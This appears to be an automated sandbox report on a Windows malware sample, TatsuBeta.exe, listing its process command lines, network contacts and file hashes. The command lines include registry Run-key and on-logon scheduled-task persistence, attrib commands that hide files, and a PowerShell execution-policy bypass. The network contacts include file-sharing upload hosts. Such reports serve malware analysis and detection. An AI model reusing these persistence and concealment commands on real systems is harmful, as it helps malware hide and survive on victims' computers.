C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_LTNxen /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_LTNxen.vbs /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_LTNxen.vbs\""

C:\Windows\system32\attrib.exe

"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_LTNxen.vbs

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salutyHOe4.ps1" -RunAsAdministrator

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salutyHOe4.ps1" -RunAsAdministrator"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_LTNxen.vbs\"""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_LTNxen /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_LTNxen.vbs /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\attrib.exe

"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe

C:\Windows\system32\schtasks.exe

schtasks /create /sc onlogon /tn WindowsDriverSetupLTNxen /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\" /F /rl highest

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupLTNxen /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe /f

C:\Windows\system32\cmd.exe

cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupLTNxen /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\" /F /rl highest

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupLTNxen /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\" /F /rl highest"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupLTNxen /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=4996 get ExecutablePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get caption, osarchitecture

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "echo %NUMBER_OF_PROCESSORS%"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get totalphysicalmemory | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get size"

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAIAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1676 --field-trial-handle=1684,16488817615885489717,17376577024114886649,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 ipinfo.io udp
GB 142.250.200.4:80 www.google.com tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 34.117.186.192:443 ipinfo.io tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:443 dns.google tcp
FR 151.80.29.83:443 api.gofile.io tcp
US 136.175.8.205:443 store6.gofile.io tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
FR 163.5.121.96:443 hawkish.eu tcp
FR 163.5.121.96:443 hawkish.eu tcp
DE 140.82.121.4:443 github.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
FR 163.5.121.96:443 hawkish.eu tcp
FR 163.5.121.96:443 hawkish.eu tcp
FR 163.5.121.96:443 hawkish.eu tcp
FR 163.5.121.96:443 hawkish.eu tcp

Files

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\System.dll

MD5 0d7ad4f45dc6f5aa87f606d0331c6901
SHA1 48df0911f0484cbe2a8cdd5362140b63c41ee457
SHA256 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca
SHA512 c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\nsis7z.dll

MD5 80e44ce4895304c6a3a831310fbf8cd0
SHA1 36bd49ae21c460be5753a904b4501f1abca53508
SHA256 b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592
SHA512 c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\chrome_200_percent.pak

MD5 b51a78961b1dbb156343e6e024093d41
SHA1 51298bfe945a9645311169fc5bb64a2a1f20bc38
SHA256 4a438f0e209ac62ffa2c14036efdd5474b5ecaa7cbf54110f2e6153abdfb8be9
SHA512 23dedde25ad9cb5829d4b6092a815712788698c2a5a0aefb4299675d39f8b5e2844eabd1ea42332a0408bd234548f5af628e7e365ab26f3385ebfa158cdd921d

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\chrome_100_percent.pak

MD5 9c1b859b611600201ccf898f1eff2476
SHA1 87d5d9a5fcc2496b48bb084fdf04331823dd1699
SHA256 53102833760a725241841312de452c45e43edd60a122546105ab4020ccef591b
SHA512 1a8ec288e53b9d7e43d018995abe4e3d9c83d329d0561fbb7d022e8b79ffecf033e995b9bc6af352a71c646a1e8afba4addb54deab7455f24b7a279a3dd7c336

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\d3dcompiler_47.dll

MD5 d7f65c6a39a04126b4ad0cfc224854f9
SHA1 1a012929139281ca6efe797b4ff74ddc3a127469
SHA256 957978c15f232d3587af92b340f6654d4e47f39e38078592a27295df463aa366
SHA512 915bdd069cb8715b42c372c6fdc39ce5b96cf512c44d6558c771855a1905dea8572868a926660ba9ff73643fb9fa5411d6ed927066e797ccae7345d9533f391d

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\ffmpeg.dll

MD5 af21bc3fa070fdec0798acb5630e62c6
SHA1 f4b749517025ee663f63d1fced2390a55131b407
SHA256 152f80e21bbc6e4686a94af1450e8533a7a9f4bbe740aa19ee165a332e7848ce
SHA512 b1c6437a3d1cbd7ed7a2debc29750f11a6b3cd6a62049c02d2b2b53344b584d334df678b61381ceba1b1c25fbefaaa20898f0405c8bf289f53d67009d03b19e2

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\icudtl.dat

MD5 cb8266efeeca5007438d5b8ae3de546a
SHA1 e626e4cf5b08d723036c00a5ead4dfa0da06dc4e
SHA256 228d3ddb4124a63b3b2ae4c78376525656913007f8d4ad1355b36359a404bf56
SHA512 2206c81d3bbef9a2826d2ede2bccb897c258ddb11ae6398ee9d1c88e03f6c7b5be58fc167b511d7c699c2d0ccafedffd88e3ccf94f73b8918d6824ac655bf9b3

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\LICENSE.electron.txt

MD5 4d42118d35941e0f664dddbd83f633c5
SHA1 2b21ec5f20fe961d15f2b58efb1368e66d202e5c
SHA256 5154e165bd6c2cc0cfbcd8916498c7abab0497923bafcd5cb07673fe8480087d
SHA512 3ffbba2e4cd689f362378f6b0f6060571f57e228d3755bdd308283be6cbbef8c2e84beb5fcf73e0c3c81cd944d01ee3fcf141733c4d8b3b0162e543e0b9f3e63

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\libGLESv2.dll

MD5 9e8e4503933d24a7f4f8f5154c57d0e3
SHA1 b15b5e5353e728604e4db906455fe6da74e51598
SHA256 7538122fd117ec6894071d7778d384ac13066bcd74a3eebd0e78bea843fe5972
SHA512 3a7bc913b96880953511d4d73d6ce0c58595f942b7625dfa4012fa387fb0d21e6d47fb7e5974b8a7168059b13fe235664a77371e62e7bc2aa13ee4f0ad1a2ad5

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\libEGL.dll

MD5 8352fd22f09b873193cabc2932be92f0
SHA1 5bd2b58854b279f1733c5f54ea2669ee8a888d9e
SHA256 14a4aaa010be14762edfee01fd1f6b9943471eb7a2f9011a2b5c230461cd129c
SHA512 7281e980f2e82f1cc8173d9f8387a97f6e23ec5099ed8dca02222c4e17fa4cfef59d6aa300b1cf06d502bdcf77d9a6dbb08ad6658ae0a28ae6f9f995109da0d2

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\LICENSES.chromium.html

MD5 cc42264e3f22034380ca6558b50845dc
SHA1 1951bbc053075e4909b6712b5741fa805ea8dcbc
SHA256 a03ad41035757df569630290da1a458bbe2e78d0380b98a36466e5b03a7f4aae
SHA512 5dc7742563b527223fc023c4934f2c89166e93992fd63ecbb9bacc057e75eb73cc51ecbf44776a05cf6d0e4c7cf856c7140e8624b8861e6b896a337b859361e9

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\resources.pak

MD5 c75a4f9da2cc096db067373179dbc60a
SHA1 840af0440da6cb48da5c7223ad69fd2b8d8e6e97
SHA256 bf50a02b0b9ab3e4fa6e057213026119e0ede2d739730159943d9185aed94f2e
SHA512 719fba1dde2572568c95852470930f8d094e57c637574fe7ee3936086e36b98e50a08dc530e3b419b5685e29ed5266e426e755f780d6ac0494bba04c36531377

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\snapshot_blob.bin

MD5 c9ab741bbef53fa0e84952b8891a5f5a
SHA1 e2dcb8d034e07243537c86371de0c52bce62cee1
SHA256 4d82fe1e642fe3ca7ad1a173f806088c0652ecfe9f0f6f6e246066e15a3431d4
SHA512 177b98a3090ecfe4b4598dfcd7e8b3ca49efafba4dbd8d6c6d0def462de47c3fabfde831725622783ddc177de982de6115178d9bd9830d918bb544a5a4c27fc9

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\v8_context_snapshot.bin

MD5 b68507a503ef9cb1bba1a990bd1ce6aa
SHA1 c94f217fdb65c4a1eb417411a145a85066327b9c
SHA256 d4d65ce6caf17ea8fa60663ad56c9e72c332143c10bceb11783cb3fdfb18fedc
SHA512 1a120afd89bb230c875244bf933fa1d7d99c6cadae6b1b958bbee2968c9c2238fb20acfa1fad57355428dbfa4c9c5b01714d8e2dbb189b180934659a84972887

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\vulkan-1.dll

MD5 78b55e98a28d9d8b0d0e34e813171fc3
SHA1 fbc6e2a7ec89ed7ef95865f9b48a7d21f05ef35a
SHA256 61aab8dbbfa04a9485480c8f77e5e6d5311a5a6d5747cb67c218a160cadeeb14
SHA512 148747a1f956d8c4977db594e787d7476d096147664fd7cc6d74fa05cd96dd79d2047811c71fe15316c2614c765fd1aa5eae3abc9bf7e2b4817bb32165f2b8b5

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\vk_swiftshader_icd.json

MD5 8642dd3a87e2de6e991fae08458e302b
SHA1 9c06735c31cec00600fd763a92f8112d085bd12a
SHA256 32d83ff113fef532a9f97e0d2831f8656628ab1c99e9060f0332b1532839afd9
SHA512 f5d37d1b45b006161e4cefeebba1e33af879a3a51d16ee3ff8c3968c0c36bbafae379bf9124c13310b77774c9cbb4fa53114e83f5b48b5314132736e5bb4496f

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\vk_swiftshader.dll

MD5 10e69113164348c34a683671eb6f626c
SHA1 b8ce6cc19107972dbe1da65132b8f4709683c9fc
SHA256 b4289b844b63397b9a01f7251b7a0b8a50563b512377d09e2885083739cd0d8a
SHA512 df5905275486c68cfb8898467badf762e786c7003773af1a1fe3f9158f0b98eb0595caaf2f6374fa7413873b4721b641638427e610bbe57e788c15b39466e663

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\TatsuBeta.exe

MD5 c71ceb9966ddef24b7ee4305274f4191
SHA1 671fdd9b78c5001f4c64c4c6e1ab2ab2bb6e0fa9
SHA256 f521f6085b851047d5bd69cf0f34d05de4aef2b03d926336fdf2c97171840afb
SHA512 bf859dbfd81ee48e9c1322b88c8db687da18848c1ca8daf6224fe2e9cfe3fa614993204151179dc60a6e4c074666311352ee84dbbbd5911e30ff52352fabce63

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\cs.pak

MD5 3cfd9dc564cfcc33cc5524711365c376
SHA1 2e5016d2643017f37658262122974429f18625a2
SHA256 8be34e4f8226c1dd4e725711ddd884ef4476560f7863edcf378573dde9db3cee
SHA512 6ee156d2fa3b6f601df28e38968d0eae2812d70b41333348dbecd833d5ee6ff944183f0eecde96be433cf1e98c8ec22d6a6d5af5153145842175ab43c73533ef

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\de.pak

MD5 b73344e5a72fca6f956dbab984c123ba
SHA1 0561073aa40a63a9ce9930dd18b18e12ff139b2b
SHA256 6dda3fa65232ca0bff7314f916942a2aa5d9be73a0b0c7a6d016eb34ea6fff5b
SHA512 e8a12da397369f23c102244b3f18f533ec79afa6978785566056bbfe07b10a21ff4973bf17aa829fff65609363988c033b0e48d4a82c846863377c08d8df009d

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\el.pak

MD5 38440b98bfdf5ed496da0f49d59534c0
SHA1 1498d9207ecaf4923a47271e24c68a817041c82e
SHA256 b1f78df8a7edc914357a2e90bc8dc0ac46f4df642bb22894569fe4905fb8ea0f
SHA512 95ba788fc2e1f07d54e398f1ec4d32c664cfb13118d46cb7af7a993367e032b10de84f3e604ab6e659d6410e2d736097ec5e9b3b002040c54412358f0ea10229

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\da.pak

MD5 55a8f5883805a65c854d25edb3959209
SHA1 d4b3b6bd2a26cbd021fa931d1f63c9ea64e2c268
SHA256 e190187adcbb5f829d162660968ba598ed17bd11339062ca4d807deec8a27fdb
SHA512 4e1f9e6da32f553cbc8cf162726d7aba9e23e2216d6d05b995cf19fff3aafa05ed08fce29b2f8538d46583366402b8630672e650dfbd46952a611e9db0d8016d

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\ca.pak

MD5 423651c45566cd90ea5edd8631e823b8
SHA1 13bed4173a08bcbfefba034aada3d838eece6d16
SHA256 7a39af99d55a1ea838d8d78c5f0da3e1402f9404d32255e31b676ceed4f0e414
SHA512 e09085023beaa37e9d5f7fdf3c32d0c001672b85e2826f0aba9a662ce958ac93cac17bf63495a604e47cb407b1593049388a4bf1b22b2339ead84a206a10569f

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\bn.pak

MD5 47c95e191e760dee3ef43345577e2379
SHA1 609634315270a91d4ec631642b18bd0036367aad
SHA256 ceed32e429ed1018d4c49343cf52105cbfd1e877c531a5738fd6e6cd33d27da7
SHA512 46b5f8d58780d19e79136c31a67d075c57ddf7e6a1eb197dea4088cc414a0dc24a68fc8ebcaac03b3940af2461123b586706d5dbf8dbdf6fbea0f7bec466db21

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\bg.pak

MD5 5ba0c7200362c9ed55610cc8b66ef53c
SHA1 d45239c2f1b00885407771a41a7776fc1fe8fa3b
SHA256 2339ff55464b4ff704fc3c5bf281eec52a539c494bd059cf0346d9c05ab7cda7
SHA512 6229dbf08a9322c4ec8de4912aa1832f01800a71b7e3ef5870e7fa2b623be4dd248fec4881c3e031e984616147be84d42ab3dd970ae56dc1bd78913a8682a37a

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\ar.pak

MD5 6f3e791b4d35ee7d9515614d128752cf
SHA1 181ec3a84fb3e89336d77f24f562a2cbe07619d8
SHA256 e9df0fa338b763a3926c4ee3a87bedf650fa618b6fcf0560c3f5ffe891d48c60
SHA512 3657e610d13a2c938558ec320c298dd490c9e4895ccd304f738aaa2f050373efd7382ca402365f93d23ed488bae82de2d859da788dc8faa8e621346a278f4441

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\am.pak

MD5 e18a450ef034b42599341c3d09f280f1
SHA1 2001c8a85904962ac3a96938eccc69ad2c110fdf
SHA256 7c2b9098130f1f9e0cf4507b64c0e96ac6354bd6c3616be20e2067cfccc820da
SHA512 ddd87571218fe9f179a6c2a8a15b182625a71a7c19ed90c0969ca2e0e9bad823b926f8b8a6b390cb6fe9c95f4b6c1f1ec7b5167a8424ab1921943922208f798a

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\en-US.pak

MD5 0bb857860d8c9ab6d617cea5a5bd4d00
SHA1 351b744d95846bff2ce5f542fec2e87439aa0f8b
SHA256 5c56df9699fc7e8f09ec81421e50a6264cde055e822f5a8cd9bb1edb3066d816
SHA512 33fb73cffbb6781488cedbca4c92a7e4f66923a799beeb7f5cba58dbc23ba8f5130f63a7dac7114e3c3ef6f1df87884fbeb8858bc7604aec9449fdfd16c25078

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\en-GB.pak

MD5 52e2826fb5814776d47a7fcaf55cb675
SHA1 51fbbc59dcd61116cbc0a24b0304d4c1c58e8d0b
SHA256 83ff81c73228c7cadba984d9b500e4fce01de583ecde8f132137650c8107c454
SHA512 69257f976d01006c5f3d7e256738c97c59115471f8e7447cfa795f7fa4ff12d6fd19708e95ffb2aa494b50c1763fe35d5885b9414112d2934baf68fe668ed7cc

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\hi.pak

MD5 590e9e73df9cbd83cd87b9c03848fec9
SHA1 da125e60a5a2c51a2d6219d3f81688bd22237b59
SHA256 089b9dd31090a987515809a68d26f6eeb64cd9283934e3dcc48b151eec7d3ad9
SHA512 fd0e5d0f2063e12b711275f390428b88f98ffaf6043cdb14b13674ac1e4aa9f70ae820ae960132d7155daf9b1308238775c4702694ab53068cdc709c50f9186a

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\he.pak

MD5 6a02a37e1ca3215fa9ee0e1b0fbcf5e7
SHA1 89a8a126c0bbf536ac58e29fc50e045fb1b88220
SHA256 f5cf34ce58b7f0d450936981aa7ffa060821403e6768eee3746ea4ffc9193986
SHA512 6607eb2329b81f1eaf0ed3a564eddcb30e6ab59229f2fbf6fd3d2140ffaa8853a330eda627a4458ef6bb06f32c5183edda869e34cd4ead1f87f88d5c622c1a16

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\gu.pak

MD5 63a7fdc4eadf8ef1c35c72468a0ce33f
SHA1 e8d064f0e9c8a6a8c6ccb036711e292d011d9466
SHA256 e549ff4e5a094d04c2ce7bc6fd68bea1f03e935437bf164bebb6191c133fa70c
SHA512 0a097ff875132a984545ec677b04f97785f14c38a1df487cfb4722cdea07d14e1e88fcff7d58b82fa53f05f4eba779a95ef320b5a91692097726d0385a26a456

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\fr.pak

MD5 c3095ce1e88b0976ba7bef183d047347
SHA1 b14cfbf6e46ac1f189595fc09660178525301138
SHA256 66488dc10517b6e3638686be95b430477a39304e92ac45dfe62b58cae3a77272
SHA512 29f47b1eff4681a9a17a50d6e82d63c22fe7bfe4ceb79862e81d8cd9f96fa38e225978b4c4b1f8e55b220235b91652c776fa8d2e559c68942c6ccf402812a421

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\fil.pak

MD5 40bddaf97f64dfea9ebafc7f82166f80
SHA1 90d1fde3c0b27d2184f0353991259c2a92c7820c
SHA256 39a9d63736e7b4593fc6873ed3c19d45fbf9eb78a012bfdcee0fea5906ebc5b2
SHA512 d1e61c53e09a0dc50edf5aba5cf286a251ee88421aa2cd49332b70a5859646605ecb7d0bb97ea7242d14a18742e23da0a14c04b0b99b57a466ec87f4f66b897e

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\fi.pak

MD5 cc592d91ce8eabaa75249cb78b889376
SHA1 f2f0f7f105a17f3e4b1a97ed0e3c2e871c2c3eac
SHA256 b1cb0b32efa78fd8634652c74f298f1d5127f2363ef601cf000417e5c7fefd20
SHA512 58e2eaffe26d8fda8df43e7ebef449cfff1065e940c128efa0276511e34e96e52da9230f294b01d4ecd8ef606b792d372bff897d6d8bb67c31379418ce867d48

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\fa.pak

MD5 6458a239e994d8d18315deccd35389ed
SHA1 75c985f43503a6c44645786d46639a6b555ae163
SHA256 300fc1c735e92917a5ddf92feb812cbf3175d988ec7ad5955110248a1addbd34
SHA512 3062075b6be0c25c957ac88e537880bc25ff86b8ef0703a05209e9676e943e89476b7997394aeb25064e03a93be614fef535676e9cdfaf44b46035225b1b2cf5

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\et.pak

MD5 c76db3385190c6840315c4497e40258a
SHA1 34f1aef2ba2925bebc5dcdb70e5b6c1a138a5c46
SHA256 e8af084ef5e1062c5966dd7802074ac24f3672dc3c9b9c5453a397644727191f
SHA512 90a870369d307758b33d74e6213676d65c2d332f42577c8aff23d96b512f3c2a2bdace8d6d9007f88b9175eadc6f2ae28b498b1265550849ff9317465a37ad29

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\es.pak

MD5 f83d8f7f6108786c02c2edbf3d85f147
SHA1 57781d9d9eb7c90cdc71f78e25d0763045b6d29a
SHA256 5b929216ac823dbe2b0bb98e64db76519900e09a86c8513019325271c66ade0d
SHA512 12747a4a61cdd21cad6e3f768cb43b8bda5ec9de373337c191b6994b20acd676c9d0a6cde8410a1e18f35dd5d2d332ea1bb7e7f8f6fc4b73d8774559e33398f1

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\es-419.pak

MD5 b261b1efe945365588befdf68879040f
SHA1 616f44a5f73f0449b483f36ccf831db6474a10d2
SHA256 1380b9edc9cee4b505f12e8eefa288d8c746ca995b52ceaba27c7741ae8a5cd4
SHA512 9ea14234b9d4d09364e5727b3886fc14544d52508b3e45fb9fd607ca88d2e432361a02b2f7ba34c3d6ecd94b91f9eccd4d54047a97a1ba4eea580ead00b91cff

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\kn.pak

MD5 5115cde84b4c674db412619b65433004
SHA1 164f33e7e2e9f685a579da492a6fc8806beb6cbf
SHA256 891e092c6895e23be986c3e6d39dcea9b6b75f1448239c13fd406680e50407a7
SHA512 090a247898cb533325d2b289a6cbd8db2a755ef0abab49d82f333e57b290c50b5996b81f15d8adc30160b216eebed3a1476aec1627195e52189557c1d48b0216

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\lt.pak

MD5 2d4fca437a7548893dc4b51fa5b33c33
SHA1 c1493013d7d981ea9223716e415380992de65c2f
SHA256 776dba792df7b444e1b720326312d8b8312cade74a1372c49456d932b7c65769
SHA512 b6a55ee1deff48d717a3e9399aef3c45eeec810cc5b5709fa3e9f56850115a5b02e02b7959ec77a6797e68516ee9372bacd260e62ac0d55a8e4c1c27af782b42

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\ru.pak

MD5 75457b95d2bb03891232dae7db886387
SHA1 e5a7569df7f91533703626d167ecc8cddbd27205
SHA256 e0894d3aa3f8e0f8ac457a3300001d4e1dcf95980712f8c8e9c845eb4c2bbfa6
